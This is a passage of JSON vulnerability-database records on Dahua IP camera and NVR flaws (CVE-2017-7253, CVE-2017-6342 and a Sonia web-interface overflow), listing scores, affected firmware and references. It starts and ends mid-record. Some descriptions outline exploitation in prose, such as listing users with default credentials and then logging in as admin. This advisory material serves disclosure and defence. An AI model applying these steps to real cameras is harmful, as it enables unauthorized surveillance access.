"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-115456",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-7253",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7253",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-04888",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-1081",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-115456",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "VULHUB",
"id": "VHN-115456"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua IP Camera devices 3.200.0001.6 can be exploited via these steps: 1. Use the default low-privilege credentials to list all users via a request to a certain URI. 2. Login to the IP camera with admin credentials so as to obtain full control of the target IP camera. During exploitation, the first JSON object encountered has a \"Component error: login challenge!\" message. The second JSON object encountered has a result indicating a successful admin login. Dahua IP Camera Devices have vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. DahuaIPCamera is a webcam from Dahua, China. A privilege escalation and information disclosure vulnerability exists in DahuaIPCamera 3.200.0001.6. \nAn attacker can exploit these issues to gain elevated privileges and obtain unauthorized access to the sensitive information",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "BID",
"id": "97263"
},
{
"db": "VULHUB",
"id": "VHN-115456"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7253",
"trust": 3.4
},
{
"db": "BID",
"id": "97263",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-04888",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-115456",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "VULHUB",
"id": "VHN-115456"
},
{
"db": "BID",
"id": "97263"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"id": "VAR-201703-1235",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "VULHUB",
"id": "VHN-115456"
}
],
"trust": 1.4857143
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
}
]
},
"last_update_date": "2023-12-18T12:51:21.933000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dahua IPC Information Disclosure \u0026 Privilege Escalation",
"trust": 0.8,
"url": "https://gist.github.com/anonymous/16aca69b7dea27cb73ddebb0d9033b02"
},
{
"title": "Dahua IP Camera Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99695"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-922",
"trust": 1.0
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-115456"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://gist.github.com/anonymous/16aca69b7dea27cb73ddebb0d9033b02"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/97263"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7253"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7253"
},
{
"trust": 0.3,
"url": "www.dahuasecurity.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "VULHUB",
"id": "VHN-115456"
},
{
"db": "BID",
"id": "97263"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"db": "VULHUB",
"id": "VHN-115456"
},
{
"db": "BID",
"id": "97263"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"date": "2017-03-30T00:00:00",
"db": "VULHUB",
"id": "VHN-115456"
},
{
"date": "2017-03-30T00:00:00",
"db": "BID",
"id": "97263"
},
{
"date": "2017-04-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"date": "2017-03-30T18:59:00.170000",
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"date": "2017-03-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-04888"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-115456"
},
{
"date": "2017-04-04T00:02:00",
"db": "BID",
"id": "97263"
},
{
"date": "2017-04-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002787"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-7253"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua IP Camera Vulnerabilities related to authorization, authority, and access control in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002787"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-1081"
}
],
"trust": 0.6
}
}
VAR-201702-1056
Vulnerability from variot - Updated: 2023-12-18 12:44An issue was discovered on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19. When SmartPSS Software is launched, while on the login screen, the software in the background automatically logs in as admin. This allows sniffing sensitive information identified in CVE-2017-6341 without prior knowledge of the password. This is a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A remote attacker can use the vulnerability to implement a rainbow table attack to obtain sensitive information. Dahua Security Multiple Products are prone to an information-disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-1056",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "smartpss",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "1.16.1"
},
{
"model": "camera",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "2.400.0000.28.r"
},
{
"model": "nvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0001.10"
},
{
"model": "camera",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2.400.0000.28.r 2016-03-29"
},
{
"model": "nvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "3.210.0001.10 2016-06-06"
},
{
"model": "smart pss",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "1.16.1 2017-01-19"
},
{
"model": "security dhi-hcvr7216a-s3",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "3.210.0001.102016-06-06"
},
{
"model": "security camera 2.400.0000.28.r",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2016-03-29"
},
{
"model": "security smartpss software",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "1.16.12017-01-19"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6342"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrew Frahn.",
"sources": [
{
"db": "BID",
"id": "96454"
}
],
"trust": 0.3
},
"cve": "CVE-2017-6342",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-6342",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-02590",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-114545",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-6342",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-6342",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2017-02590",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-919",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-114545",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "VULHUB",
"id": "VHN-114545"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19. When SmartPSS Software is launched, while on the login screen, the software in the background automatically logs in as admin. This allows sniffing sensitive information identified in CVE-2017-6341 without prior knowledge of the password. This is a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. A remote attacker can use the vulnerability to implement a rainbow table attack to obtain sensitive information. Dahua Security Multiple Products are prone to an information-disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "BID",
"id": "96454"
},
{
"db": "VULHUB",
"id": "VHN-114545"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6342",
"trust": 3.4
},
{
"db": "BID",
"id": "96454",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-02590",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-114545",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "VULHUB",
"id": "VHN-114545"
},
{
"db": "BID",
"id": "96454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"id": "VAR-201702-1056",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "VULHUB",
"id": "VHN-114545"
}
],
"trust": 1.60625
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
}
]
},
"last_update_date": "2023-12-18T12:44:41.681000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HCVR7204/7208/7216A-S3",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
},
{
"title": "Dahua DHI-HCVR7216A-S3 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99658"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-269",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114545"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/96454"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6342"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6342"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "VULHUB",
"id": "VHN-114545"
},
{
"db": "BID",
"id": "96454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"db": "VULHUB",
"id": "VHN-114545"
},
{
"db": "BID",
"id": "96454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"date": "2017-02-27T00:00:00",
"db": "VULHUB",
"id": "VHN-114545"
},
{
"date": "2017-02-27T00:00:00",
"db": "BID",
"id": "96454"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"date": "2017-02-27T07:59:00.410000",
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"date": "2017-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02590"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114545"
},
{
"date": "2017-03-07T01:08:00",
"db": "BID",
"id": "96454"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002229"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-6342"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DHI-HCVR7216A-S3 Vulnerability to view important information without password information on the device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002229"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-919"
}
],
"trust": 0.6
}
}
VAR-201807-0267
Vulnerability from variot - Updated: 2023-12-18 12:36Dahua IP camera products using firmware versions prior to V2.400.0000.14.R.20170713 include a version of the Sonia web interface that may be vulnerable to a stack buffer overflow. Dahua IP camera products include an application known as Sonia (/usr/bin/sonia) that provides the web interface and other services for controlling the IP camera remotely. Versions of Sonia included in firmware versions prior to DH_IPC-Consumer-Zi-Themis_Eng_P_V2.408.0000.11.R.20170621 do not validate input data length for the 'password' field of the web interface. A remote, unauthenticated attacker may submit a crafted POST request to the IP camera's Sonia web interface that may lead to out-of-bounds memory operations and loss of availability or remote code execution. The issue was originally identified by the researcher in firmware version DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803. Crafted, sent from a remote third party POST Processing the request can cause a stack-based buffer overflow. The problem is the firmware DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803 First identified.Crafted, sent by a remote third party POST Service disruption by processing requests (DoS) An attack may be performed or arbitrary code may be executed on the product. DahuaIPCamera is a webcam from Dahua, China. DahuaIPCamera has a stack buffer overflow vulnerability. An attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service in the context of 